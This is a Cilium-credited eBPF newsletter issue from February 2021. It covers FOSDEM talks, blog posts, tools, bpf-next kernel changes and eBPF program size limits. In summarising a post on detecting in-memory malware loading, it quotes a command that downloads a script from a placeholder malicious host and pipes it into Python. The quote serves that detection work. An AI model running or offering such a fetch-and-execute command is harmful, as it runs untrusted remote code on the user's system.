February 23, 2021

eBPF Updates #4: In-Memory Loads Detection, Debugging QUIC, Local CI Runs, MTU Checks, but No Pancakes

    In several parts of the globe, February is traditionally about love, and pancakes. eBPF sure received a lot of love over the last weeks! Blogging, conferencing, and kernel development have resumed at full speed after the quiet period at the end of the year. Here are all the latest updates, plus a section focusing on program size limits. Alas, it remains uncertain whether eBPF is getting any pancakes.

    New Resources

    Besides pancakes and Valentine's Day, early February is also marked by one of the biggest events centered on open-source: FOSDEM! This year's edition was held online, and included several presentations related to eBPF.

    • Advanced BPF kernel features for the container age, from Daniel Borkmann.
      eBPF is in a unique position to efficiently process and steer packets at different steps of their travel through the stack. Cilium relies on it to implement advanced networking features for cloud-native environments. After a brief reminder on the potential of eBPF, Daniel dives into three of those features: consistent service load-balancing for Kubernetes with XDP and Maglev, low-latency Pod fast-path through dedicated eBPF helpers to bypass iptables rules and other parts of the stack, and EDT (Earliest Departure Time) rate-limiting for Pods. Recommended if you want to learn more on advanced networking features entirely implemented with eBPF.
    • hXDP: Efficient Software Packet Processing on FPGA NICs, from Marco Spaziani Brunella.
      hXDP is an eBPF hardware offload implementation for FPGA-based NICs. Through hardware functions, some additional compiler work, and custom optimizations, it achieves great performance. The latest efforts include work on a higher-end platform and an attempt to implement eight processing cores instead of one.
    • Networking Performances in the Linux Kernel, Getting the most out of the Hardware, from Maxime Chevallier.
      Definitely centered on networking, this presentation follows the path of packets through the low-level mechanisms involved in the hardware and in the Linux stack. There is not much about eBPF itself, but the last section of the talk helps understand how XDP and AF_XDP complement the other networking components in the kernel.
    • Monitoring MariaDB Server with bpftrace on Linux, from Valerii Kravchuk.
      This presentation is both an introduction to bpftrace itself and to its application to MariaDB tracing. The objective is to add uprobes, get stack traces, or inspect some specific components to trace and profile the MariaDB server in production. Benchmark results confirm that bpftrace performs better than pt-pmp or perf.
      Valerii also covered the topic in a series of posts on his blog.
    • Seccomp Notify on Kubernetes, from Alban Crequy.
      This talk demonstrates how an unprivileged container can use seccomp notify to proxy some system calls, including bpf(), to the container manager. Seccomp relies on cBPF (classic BPF) to filter system calls and take actions on them. Seccomp notify is a recent update where seccomp can return a file descriptor and hand it to another task, so that this task can analyze the data involved in the filtered system call and potentially emulate it from user space. Christian Brauner has written extensively about seccomp notify and the bpf() use case.
    • Deploying eBPF, XDP & AF_XDP for Cloud Native, from Dave Cremins and Gary Loughnane.
      As per the abstract, “This talk will cover an introduction to AF_XDP, why it is suited to cloud native microservices, how it can be deployed today and the deployment challenges as well as their solutions.” [We could not attend the presentation, and the video and slides have not been uploaded yet as of this writing].

    And then here are some resources published over the last weeks, independent from FOSDEM.

    • Running eBPF and Perf in Docker for Mac, from Peter Malmgren.
      Perf and eBPF tools come in handy to trace processes and to pin down the origin of a performance bottleneck. Motivated by the need to identify the cause of a slowdown in a Docker container running on macOS, this post explains how to install the Linux headers, to compile BCC and bpftrace, and to run them in the container.
    • Debugging QUIC with H2O and QLog, from Toru Maesaka.
      The H2O HTTP server deployed by Fastly has a built-in event tracing infrastructure, powered by eBPF or DTrace depending on the platform. This post is not really about eBPF, but it presents an interesting use case of eBPF with USDT (probes for user space applications) to adapt QLog to the H2O server and get logs to debug and improve QUIC, a network protocol implemented in user space.
    • eBPF & the future of osquery on Linux (video), from Zach Wasserman.
      Osquery has been relying on the Audit subsystem in Linux to provide system visibility, which is powerful but comes with some drawbacks. For example, it supports a single consumer, making osquery conflict with the auditd daemon, and it lacks awareness of containers. eBPF can be used since osquery 4.6.0 as an alternative backend to collect data, circumventing these issues and coming with “a potential to dramatically increase scope of observability”.
    • eBPF Tools: An Overview of Falco, Inspektor Gadget, Hubble and Cilium, from Lucas Severo Alves.
      Here is an introduction to each of the four eBPF-based tools mentioned in the title, accompanied by example use cases. All these tools focus on cloud-native environments, so this post provides a good overview of the eBPF landscape in the cloud, and of the different issues it addresses in terms of security, tracing, visibility, and networking.
    • Datadog On eBPF (video), from Lee Avital, Guillaume Fournier and Ara Pulido.
      Various aspects of eBPF are covered in this presentation. After introducing the basics, Datadog discusses technical details related to their workflow: Is it better to guess the offset of kernel structures or to rely on runtime compilation? They also describe two of their use cases for eBPF, network monitoring and runtime security.
    • A Beginner's Guide to eBPF with Go (PDF), from Liz Rice.
      Learn how to program with eBPF and Go with this accessible tutorial. After a reminder of the basics of eBPF, this presentation focuses on a simple tracing example with bpftrace. Then it explains how to write a first “Hello, World!” program with eBPF and the libbpfgo Go bindings for the libbpf C library, before showing how to recreate the bpftrace command previously introduced.
    • Using eBPF to uncover in-memory loading, from Pat H.
      Tracing with eBPF can be adapted to nearly any use case. In this post, programs are attached to trace the calls to dup2(), write() and read(), in order to detect when two processes are sharing information through a bash pipe (|). The objective of the experiment is to detect commands constructed like this: curl https://dodgy.com/loader.py | python -, where a rogue process attempts in-memory loading of malware. The post contains a refresher on how writing to and reading from pipes work on Linux, making it easy to understand and follow where the eBPF programs are attached.

    Software Projects

    • The new https://editor.cilium.io/ is a NetworkPolicy editor, introduced by the Cilium community as an easy and interactive way to learn, create, visualize, and share Kubernetes NetworkPolicies. It provides an intuitive overview of some of the features that Cilium implements with eBPF. More details are available in the editor's announcement.
    • Tracee version 0.5.0 is out. From a tracing command line tool, the project evolves into a runtime security solution and now encompasses tracee-ebpf—the command-line tool itself—and the libbpfgo library. It also includes tracee-rules, a “new rule engine to process tracee-ebpf's events and detects suspicious behavior based on built-in and user-defined 'signatures'”, which are defined in Open Policy Agent's Rego language or in Go.
    • TCPDog is a new tool to collect TCP statistics with eBPF and to export them to an Elasticsearch or InfluxDB database. It can collect from all TCP-related kernel tracepoints at the same time, but the parameters to collect are configurable.

    Software: Demos and Experiments

    • Guardicore released IPCDump for tracing interprocess communications on Linux, be it through pipes, FIFOs, signals, UNIX sockets, loopback-based networking, or pseudoterminals. It draws some inspiration from Windows's procmon. Internally, it uses the gobpf library that provides Go bindings for the BCC framework. See also the announcement post for more details, with a few examples of tracing communication from Chrome events, or between processes like containerd and dockerd.
    • Liz Rice has published a set of basic eBPF examples using libbpfgo. The eBPF program is trivial; the objective is to get familiar with libbpfgo, a set of bindings in Go to the libbpf C library.
    • XDP minimal example is a note from Peter Ruderich describing a small but standalone XDP example, with a few explanations and pointers. This is an interesting program to get started with XDP (but don't forget the XDP tutorial).
    • BPF-UprobeDBG is a proof-of-concept experiment showing how to send signals to a process from a uprobe tracing a function of that same process. If that process is being debugged in gdb for example, this will stop its execution and allow for close inspection as well as step-by-step debugging. The eBPF program is responsible for computing the precise conditions under which the improvised breakpoint should trigger.

    Podcasts

    • Break Things on Purpose | Mikolaj Pawlikowski, Engineering Lead at Bloomberg, interview from Jason Yee and Pat Higgins.
      Centered on Chaos Engineering, this episode mentions eBPF as “a game changer” in terms of visibility. The technology uses small code snippets, has a low overhead, but allows for unprecedented inspection and metrics gathering, most of the time without the traced application knowing anything about visibility.

    Members of the Cilium community have been very active, and contributed to several podcasts on eBPF and Cilium over the last weeks:

    • The Weekly Squeak - eBPF Cloud Native computing with Neela Jacques of Isovalent, interview from Chris Chinchilla.
      By operating from inside the kernel, eBPF offers unprecedented capabilities in terms of tracing and network processing. This allows Cilium and then Isovalent to propose powerful solutions that address both the networking and security aspects of containerized workflows, in particular in a context where security requirements have been evolving a lot over the last few years, and where securing only at the perimeter is no longer an option. eBPF brings all this, Neela explains, and makes it scale efficiently.

    The Kernel Side

    Here is a summary of the main changes included in the second pull request for the bpf-next tree for the 5.12 cycle.

    • Add a script to run the eBPF CI locally. It was already possible to build and run the eBPF selftests locally, but this script runs them on the same kernel image as the continuous integration framework that validates patch sets on their submission. The objective is to have contributors run the selftests on their machine but in the same environment as the CI, to check for regressions and reduce the back-and-forth between maintainers and developers. If you send patches to the bpf or bpf-next trees, take note! (KP Singh, link)
    • Support passing pointers to types with known size as arguments to a global function. The objective is to overcome the limit on the maximum number of allowed arguments for eBPF functions (five arguments): Additional arguments can be stored in a struct, and a pointer to this struct passed to the function. The struct can contain pointers, but they cannot be dereferenced in the callee. Passing pointers is not supported for static functions (The distinction between global and static functions is conveyed by the BTF information loaded alongside the program). (Dmitrii Banshchikov, link)
    • Add an eBPF iterator for task_vma which allows the user to generate information similar to what is available from /proc/pid/maps, but customized for their needs. For example, when a VMA (Virtual Memory Area) covers mixed 2MB pages and 4kB pages, one use case is to indicate which address ranges are backed by 2MB pages. (Song Liu, link)
    • Allow bpf_getsockopt() and bpf_setsockopt() helpers from all sock_addr-related program hooks, so that listener sockets attached to cgroups can query or modify socket options as needed at the various available attach points. (Stanislav Fomichev, link)
    • In a set containing various improvements, Alexei adds a mechanism to prevent recursion on fentry/fexit programs (extendable to sleepable programs in the future). A recursion would occur, for example, when tracing a function called by an eBPF helper, with a program that would itself call that helper. Other patches in the set also enable the use of “map-in-map” and per-CPU maps, as well as statistics, for sleepable programs (A few tracing programs and eBPF LSM programs can request, at load time, to be sleepable in order to call helpers requiring the ability to sleep). (Alexei Starovoitov, link)
    • Support the use of eBPF ring buffers for sleepable programs. (KP Singh, link)
    • Extend the verifier to enable variable offset read and write access to the eBPF program stack. For example, if a stack-allocated array is declared in a program, it becomes possible (under certain conditions) to read from or write to a cell at an index which is not statically known at compile and load time, but only determined at runtime. (Andrei Matei, link)
    • Rework MTU handling in TC and XDP programs. MTU (Maximum Transmission Unit) checks performed by the eBPF helpers were sometimes too conservative and prevented a packet from growing, because they did not account for a possible redirection and looked at the MTU of the wrong interface. This set lifts some of the limitations, and adds a new bpf_check_mtu() helper to allow eBPF programs to query a device's MTU and run the check themselves. (Jesper Dangaard Brouer, link)
    • Extend the bpf_get_socket_cookie() helper to make it available from tracing programs, including sleepable ones. (Florent Revest, link)
    • Clean up and slightly improve the performance for AF_XDP sockets. Also add a probe to libbpf (but it should be moved to libxdp in the future) to check what features the kernel supports, and pick the most efficient eBPF program to load from the library when setting up the socket. (Björn Töpel, link)
    • Allow BTF to contain information on zero-sized .rodata ELF sections. Such sections may be formed by certain read-only (const) initialized variables, that the compiler stores into the .rodata as global variables. Because the variable was not initially declared as global, there is no debug information to store in the BTF information for that section. (Yonghong Song, link)
    • Improve XDP performance for veth by allocating socket buffers in bulk for ndo_xdp_xmit(). (Lorenzo Bianconi, link)
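
    The global-function change listed above (pointers to types with known size) can be pictured with a short sketch. This is ordinary user-space C rather than a loadable eBPF object, and the names flow_args and score_flow() are hypothetical. The NULL check reflects our understanding that the verifier treats such an argument as possibly NULL inside the callee; take it as an assumption.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical bundle of six values: one more than the five arguments
 * an eBPF function can take directly. */
struct flow_args {
    uint32_t saddr;
    uint32_t daddr;
    uint16_t sport;
    uint16_t dport;
    uint8_t  proto;
    uint8_t  flags;
};

/* The pointed-to type must have a size known at compile time. */
static_assert(sizeof(struct flow_args) == 16, "unexpected struct layout");

/* Deliberately not static: per the change described above, only global
 * functions may take such pointers. noinline keeps it a real call. */
__attribute__((noinline))
uint32_t score_flow(const struct flow_args *args)
{
    if (!args)  /* assumption: the callee must rule out NULL first */
        return 0;

    /* Fold all six fields into one value, just to use every field. */
    return args->saddr ^ args->daddr ^
           (((uint32_t)args->sport << 16) | args->dport) ^
           args->proto ^ args->flags;
}
```

    A caller fills a struct flow_args on its own stack and passes its address, so a single argument slot carries all six values.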

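    The variable-offset stack access described in the list above can be sketched as follows. This is plain user-space C with hypothetical names (SLOTS, pick_slot()); the masking step is our assumption of one way to give the verifier a provable bound, and the exact conditions it enforces are not covered here.

```c
#include <assert.h>
#include <stdint.h>

#define SLOTS 8u
static_assert((SLOTS & (SLOTS - 1)) == 0, "SLOTS must be a power of two");

uint32_t pick_slot(uint32_t runtime_index)
{
    uint32_t slots[SLOTS];  /* array allocated on the stack */

    /* Initialize every cell before any variable-offset access. */
    for (uint32_t i = 0; i < SLOTS; i++)
        slots[i] = i * 10;

    /* The index is only known at runtime; masking keeps it within
     * [0, SLOTS - 1] whatever value comes in. */
    uint32_t idx = runtime_index & (SLOTS - 1);

    slots[idx] += 1;    /* variable-offset write to the stack */
    return slots[idx];  /* variable-offset read from the stack */
}
```
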
    Did You Know? Program size limit

    Do you know what the maximum size of an eBPF program is? You may have heard of programs limited to 4k instructions, but this changed some time ago.

    One particularity of eBPF programs, enforced at load time by the kernel verifier, is that they must run and eventually terminate within a relatively short delay. Allowing for long runs would slow down the kernel too much. Permitting users to run arbitrary programs, possibly containing infinite loops, could even hang the kernel completely.

    To avoid that, the verifier builds the directed acyclic graph (DAG) representing the possible paths of execution in the program, and ensures that each one leads to termination. Sometimes, some branches “overlap” between several paths, and under certain conditions the verifier can skip verifying them after the first occurrence. This is called “state pruning”. Without this mechanism, the number of instructions to validate would be too high and slow down program loading beyond what is acceptable.

    When eBPF was introduced, two parameters limited the size of a program:

    • The maximum number of instructions for a program: 4096
    • The complexity limit: 32768

    The second number represents the number of instructions that the verifier is allowed to check before forfeiting the verification and rejecting the program. You may think of it as “the total number of instructions cumulated over all the execution paths, minus those on branches that the verifier is able to prune”. So if a program had many logical branches and would require too much effort from the verifier, it would fail to load, even if it had fewer than 4096 instructions.
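
    To get a feel for the numbers, here is a deliberately crude model, not a description of how the verifier actually counts. It assumes a program made of straight segments of equal length, separated by two-way branches whose arms rejoin immediately, and compares a verifier that prunes nothing with one that prunes perfectly. All function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Toy model: the program is (branches + 1) straight segments of
 * seg_len instructions each, separated by two-way branches. */

/* Number of instructions in the program itself. */
uint64_t program_size(uint64_t seg_len, unsigned branches)
{
    return seg_len * (branches + 1);
}

/* Without pruning, the segment after the i-th branch is walked 2^i
 * times, so the total is seg_len * (2^(branches + 1) - 1). */
uint64_t verified_without_pruning(uint64_t seg_len, unsigned branches)
{
    assert(branches < 32);  /* keep the shift well within 64 bits */
    return seg_len * ((UINT64_C(1) << (branches + 1)) - 1);
}

/* With perfect pruning, every segment is walked exactly once. */
uint64_t verified_with_pruning(uint64_t seg_len, unsigned branches)
{
    return program_size(seg_len, branches);
}
```

    With 100-instruction segments and 8 branches, the program has 900 instructions, well under 4096. In this model the unpruned walk covers 100 times 511, or 51,100 instructions, which exceeds the original 32,768 limit, whereas the perfectly pruned walk covers only 900.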

    But both limits were changed [1] in a commit in Linux 5.2. The complexity limit was raised to one million verified instructions. As for the maximum number of instructions, that limit simply disappeared, meaning that the size of programs is now bounded by the complexity of their verification. There is still a de facto hard limit of one million instructions, for a program that would have a single logical branch (no “if” and no comparisons anywhere). In practice, such a program would be of little interest. Programs have branches, their verification is more complex, and their allowance for instructions decreases accordingly.

    The 4096-instruction limit did not, in fact, disappear entirely. The kernel still enforces it for programs loaded by non-root users (more precisely, users without CAP_SYS_ADMIN or, starting with Linux 5.8, CAP_BPF).
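
    The figures given in this section and in its footnote can be collected into a small lookup. This sketch only restates those numbers; the function names are hypothetical, and we assume that the 64k, 96k, and 128k values are multiples of 1024, like the original 32768.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* True if kernel major.minor is at least want_major.want_minor. */
static bool at_least(int major, int minor, int want_major, int want_minor)
{
    return major > want_major ||
           (major == want_major && minor >= want_minor);
}

/* Complexity limit, in verified instructions, for a given kernel.
 * Returns 0 for kernels older than Linux 3.18. */
uint32_t complexity_limit(int major, int minor)
{
    if (at_least(major, minor, 5, 2))  return 1000000;
    if (at_least(major, minor, 4, 14)) return 128 * 1024;
    if (at_least(major, minor, 4, 12)) return 96 * 1024;
    if (at_least(major, minor, 4, 7))  return 64 * 1024;
    if (at_least(major, minor, 3, 18)) return 32 * 1024;
    return 0;
}

/* Maximum program length, in instructions. "privileged" stands for
 * CAP_SYS_ADMIN or, starting with Linux 5.8, CAP_BPF. */
uint32_t max_prog_insns(int major, int minor, bool privileged)
{
    assert(at_least(major, minor, 3, 18));
    if (privileged && at_least(major, minor, 5, 2))
        return complexity_limit(major, minor);
    return 4096;
}
```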

    eBPF programs tend to be small, and the one-million-instruction complexity limit is big enough that most use cases will never hit it. Some advanced projects using eBPF to implement more complex features may run into it, and Cilium, for example, regularly adjusts its code to satisfy the verifier's requirements. Ways to work around complexity include the use of tail calls and bounded loops (introduced in Linux 5.3), or reorganizing the code so that the number of branches decreases or the verifier can prune them more efficiently.
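
    As an illustration of the bounded-loop option, the sketch below uses a loop whose trip count is capped by a compile-time constant, which is the kind of loop that bounded-loop support is meant to accept. It is plain user-space C, and MAX_ITER and sum_prefix() are hypothetical names; a real eBPF program would additionally need its memory accesses to pass verification.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define MAX_ITER 64  /* hard cap on the number of iterations */

/* Sum at most MAX_ITER bytes of data, stopping early at len. */
uint32_t sum_prefix(const uint8_t *data, size_t len)
{
    uint32_t sum = 0;

    assert(data != NULL || len == 0);

    /* The loop condition depends only on the constant MAX_ITER, so
     * the loop cannot run more than MAX_ITER times, whatever len is. */
    for (size_t i = 0; i < MAX_ITER; i++) {
        if (i >= len)
            break;
        sum += data[i];
    }
    return sum;
}
```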

    Hardware offload is yet another story, and has entirely different constraints since the program must fit into the hardware's memory. The bound is set as much by the verifier as by the hardware's capacity, with the efficiency of bytecode generation and then of the JIT-compiler both playing a role.

    The new one-million-instruction complexity limit should be flexible enough for most use cases, and in the end, programs truly have one bound: Your imagination!

    Community

    The eBPF community keeps growing!

    However, one of the challenges that remain is apparently to find enough time to start working with eBPF.

    Now all we are missing is a tweet about eBPF and pancakes.

    Credits

    eBPF Updates are brought to you by the Cilium project. This report was produced by Quentin Monnet (Isovalent). Thanks to the Cilium engineering team for input and reviews.

    If you would like to submit contributions for the next report, please submit them via the #ebpf-news channel on eBPF Slack.


    1. The complexity limit was actually changed several times since the 32k value from its introduction in Linux 3.18: it was raised to 64k in Linux 4.7, then to 96k in Linux 4.12, again to 128k in Linux 4.14, and at last to 1M in Linux 5.2.